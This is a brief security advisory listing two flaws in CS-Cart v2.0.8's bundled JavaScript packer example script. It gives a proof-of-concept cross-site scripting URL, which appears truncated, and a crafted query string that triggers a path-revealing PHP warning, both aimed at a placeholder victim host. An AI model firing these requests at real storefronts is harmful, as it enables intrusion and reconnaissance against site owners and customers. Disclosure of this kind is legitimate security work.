Application: CS-Cart v2.0.8 Authors Site: http://www.cs-cart.com/ +--------------------------------------------------------------------------------------------+ [1]------------------------------------------------------------------------------------------> XSS: http://www.victim.com/cscart/lib/packer/example-inline.php/>"> [2]------------------------------------------------------------------------------------------> Information Disclosure: http://www.victim.com/cscart/lib/packer/example-inline.php?src=&ascii_encoding=0&fast_decode=on&special_char=on Result: Warning: Division by zero in /var/www/cscart/lib/packer/example-inline.php on line 20 +-[Notes:]-----------------------------------------------------------------------------------+ CS-Cart comes with a number of librarys as default, this packer.php appears to be based apon: "Dean Edwards JavaScript 's Packer (packer, version 2.0.2 (2005-08-19))". Vulnerabilities found on: 20/09/2009 Author(s) Informed on: Not Informed Author(s) Response: NA Author(s) Fix: NA JohnC@NoBytes.com http://www.NoBytes.com